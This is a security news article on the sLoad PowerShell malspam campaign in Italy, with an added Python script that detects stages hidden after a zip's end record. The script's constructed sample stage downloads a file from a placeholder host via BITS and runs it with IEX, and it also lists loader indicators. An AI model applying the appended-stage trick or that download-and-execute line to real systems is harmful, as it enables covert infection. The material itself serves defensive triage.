The SLoad Powershell malspam is expanding to Italy
A new malspam campaign has hit Italy in recent days: threat actors are spreading a new variant of a powerful downloader named sLoad.
sLoad is a sophisticated script, used in the past to deliver different types of malware such as the dreaded Ramnit banking trojan.
“In the past months CERT-Yoroi observed an emerging attack pattern targeting its constituency. This series of malicious email messages shared common techniques and may likely be related to a single threat group starting its operation against the Italian cyber panorama.” reads the analysis published by Yoroi.
“It is still not clear if these attack attempts may be originated by any well-established cybercrime group modifying its TTP or a completely new one, however CERT-Yoroi is tracking this threat with the internal codename ‘Sload-ITA’ (TH-163).”
sLoad implements a broad range of capabilities, including the ability to take screenshots, read the list of running processes, exfiltrate the DNS cache, exfiltrate Outlook e-mail and other typical spyware functionalities.
As usual, it arrives as a zip file attached to an e-mail; the archive contains two elements:
- A fake shortcut to a directory (.lnk file);
- A legitimate image flagged as hidden.
Oddly, the image plays no role in the malware’s workflow; the .lnk file, however, starts a complex infection chain, as shown in the following figure:
First, the .lnk file runs a PowerShell activator, which searches for a file named “documento-aggiornato-novembre-*.zip”.
If the .zip file exists, the activator extracts and runs a portion of code appended to the end of that same archive. This works because archive readers locate a zip by its End of Central Directory record, searching backwards from the end of the file, so bytes appended after it do not stop the decoy from opening normally. The extracted PowerShell script in turn acts as the next dropper in the attack chain.
This PowerShell code abuses the Windows Background Intelligent Transfer Service (BITS, via BitsTransfer) to download two files, config.ini and web.ini, which carry the final sLoad stage.
The malicious code gains persistence through a scheduled task, registered in the Windows Task Scheduler, that runs a Visual Basic script. Both the BITS transfer and the scheduled task leave artefacts that defenders can enumerate on a suspect host (for example with `bitsadmin /list /allusers /verbose` and `schtasks /query /v /fo LIST`).
Finally, once sLoad is running, it periodically takes screenshots, gathers system information and sends the collected data to the C2.
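The first step of the chain, code hidden at the end of an otherwise valid zip, is the part of this procedure a triage script can check directly. The following Python is an added example and is not code from the Yoroi analysis, from Security Affairs or from sLoad itself: it builds a constructed decoy archive (a placeholder .lnk and image), appends a constructed stand-in PowerShell stage after the End of Central Directory record, then shows how to separate the bytes an unzipper consumes from the ones it silently ignores and scan the hidden part for loader behaviour. The file names, the `example.invalid` URL and the indicator list are this example's own assumptions.

```python
"""Added example (not from the Yoroi write-up or Security Affairs): triage a
ZIP attachment for a stage hidden after the End Of Central Directory (EOCD)
record or inside the archive comment, the trick an activator relies on when
it runs code "present at the end of the same file".

Everything here is constructed: the decoy archive, the stand-in PowerShell
stage and the indicator list are this example's own assumptions.
"""
import io
import re
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"  # End Of Central Directory signature
EOCD_LEN = 22             # fixed-size part of the EOCD record
MAX_COMMENT = 0xFFFF      # the comment length field is 16 bits

# Loader behaviour worth flagging in an appended stage (assumed indicator set,
# not taken from the article or the Yoroi IoCs).
PS_INDICATORS = (
    r"Start-BitsTransfer", r"Invoke-Expression", r"\bIEX\b",
    r"FromBase64String", r"schtasks", r"wscript", r"Get-Content",
)

# Constructed stand-in for an appended stage; it is not sLoad code.
SAMPLE_STAGE = (
    b"$u='https://example.invalid/web.ini';"
    b"Start-BitsTransfer -Source $u -Destination $env:APPDATA\\web.ini;"
    b"IEX (Get-Content $env:APPDATA\\web.ini -Raw)\n"
)


def build_decoy_zip(trailer: bytes, comment: bytes = b"") -> bytes:
    """Build a valid ZIP holding a shortcut and an image (placeholder bytes),
    then append `trailer` after the EOCD record. An optional archive comment
    is the other place a stage can hide without breaking the archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("documento.lnk", b"L\x00\x00\x00" + b"\x00" * 72)
        zf.writestr("foto.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)
        zf.comment = comment
    return buf.getvalue() + trailer


def locate_eocd(data: bytes) -> int:
    """Offset of the EOCD record, searched backwards from the end of the file
    the way archive readers do, so this agrees with what an unzipper accepts."""
    window_start = max(0, len(data) - (EOCD_LEN + MAX_COMMENT))
    idx = data.rfind(EOCD_SIG, window_start)
    if idx < 0:
        raise ValueError("no EOCD record found: not a ZIP archive")
    return idx


def split_archive(data: bytes) -> dict:
    """Separate the bytes an unzipper consumes from the ones it ignores."""
    eocd = locate_eocd(data)
    comment_len = struct.unpack_from("<H", data, eocd + 20)[0]
    logical_end = eocd + EOCD_LEN + comment_len
    return {
        "comment": data[eocd + EOCD_LEN:logical_end],
        "trailer": data[logical_end:],   # anything past the logical end
    }


def powershell_indicators(blob: bytes) -> list:
    """Return the indicator patterns matched in the hidden bytes."""
    text = blob.decode("latin-1")  # lossless for arbitrary bytes
    return [pat for pat in PS_INDICATORS if re.search(pat, text, re.IGNORECASE)]


def triage(data: bytes) -> dict:
    """Open the archive normally and report what lies outside its structure."""
    parts = split_archive(data)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = zf.namelist()   # the decoy still opens cleanly
    hidden = parts["comment"] + parts["trailer"]
    hits = powershell_indicators(hidden)
    return {
        "members": members,
        "comment_bytes": len(parts["comment"]),
        "trailer_bytes": len(parts["trailer"]),
        "indicators": hits,
        # Obfuscated stages defeat token matching, so any trailing data is
        # suspicious on its own; the comment is only flagged on indicators.
        "suspicious": bool(parts["trailer"]) or bool(hits),
    }


if __name__ == "__main__":
    print(triage(build_decoy_zip(SAMPLE_STAGE)))
    print(triage(build_decoy_zip(b"")))
```

Two points from running it: the decoy lists its two members exactly as a victim's archiver would, so nothing in the user-visible view betrays the stage; and the token scan is only a starting point, since a real dropper will be obfuscated, which is why any bytes past the logical end of the archive are flagged regardless of content.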
Technical details about the sLoad malware, including IoCs and Yara rules, are available on the Yoroi blog.
(Security Affairs – malspam, malware)
The post The SLoad Powershell malspam is expanding to Italy appeared first on Security Affairs.